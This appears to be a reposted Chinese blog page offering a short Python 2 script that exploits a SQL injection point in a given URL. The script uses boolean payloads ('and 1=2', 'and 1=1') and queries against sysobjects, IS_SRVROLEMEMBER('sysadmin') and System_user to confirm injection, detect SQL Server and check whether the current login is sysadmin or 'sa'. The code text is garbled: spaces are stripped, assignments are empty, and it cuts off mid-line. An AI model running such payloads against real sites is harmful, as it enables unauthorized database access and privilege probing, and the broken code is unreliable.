Python编写数据库SA用户检测方案无聊的时候,用Python写的一个小程序,用有注入点的链接,检测当前数据库用户是否为sa,没什么技术含量。#CodebyzhaoxiaobuEmail:@ #-*-coding:UTF-8-*- fromsysimportexit fromurllibimporturlopen fromstringimportjoin,strip fromreimportsearch defis_sqlable(): sql1="%20and%201=2" sql2="%20and%201=1" urlfile1=urlopen(url+sql1) urlfile2=urlopen(url+sql2) htmlcodes1=() htmlcodes2=() ifnotsearch(judge,htmlcodes1)andsearch(judge,htmlcodes2): print"[信息]恭喜!这个URL是有注入漏洞的!n" print"[信息]现在判断数据库是否是SQLServer,请耐心等候....." is_SQLServer() else: print"[错误]你确定这个URL能用?换个别的试试吧!n" defis_SQLServer(): sql="%20and%20exists%20(select%20*%20from%20sysobjects)" urlfile=urlopen(url+sql) htmlcodes=() ifnotsearch(judge,htmlcodes): print"[错误]数据库好像不是SQLServer的!n" else: print"[信息]确认是SQLServer数据库!n" print"[信息]开始检测当前数据库用户权限,请耐心等待......" is_sysadmin() defis_sysadmin(): sql="%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" urlfile=urlopen(url+sql) htmlcodes=() ifnotsearch(judge,htmlcodes): print"[错误]当前数据库用户不具有sysadmin权限!n" else: print"[信息]当前数据库用户具有sysadmin权限!n" print"[信息]检测当前用户是不是SA,请耐心等待......" is_sa() defis_sa(): sql="%20and%20'sa'=(select%20System_user)"; urlfile=urlopen(url+sql) htmlcodes=u
Python编写数据库SA用户检测方案 来自淘豆网m.daumloan.com转载请标明出处.
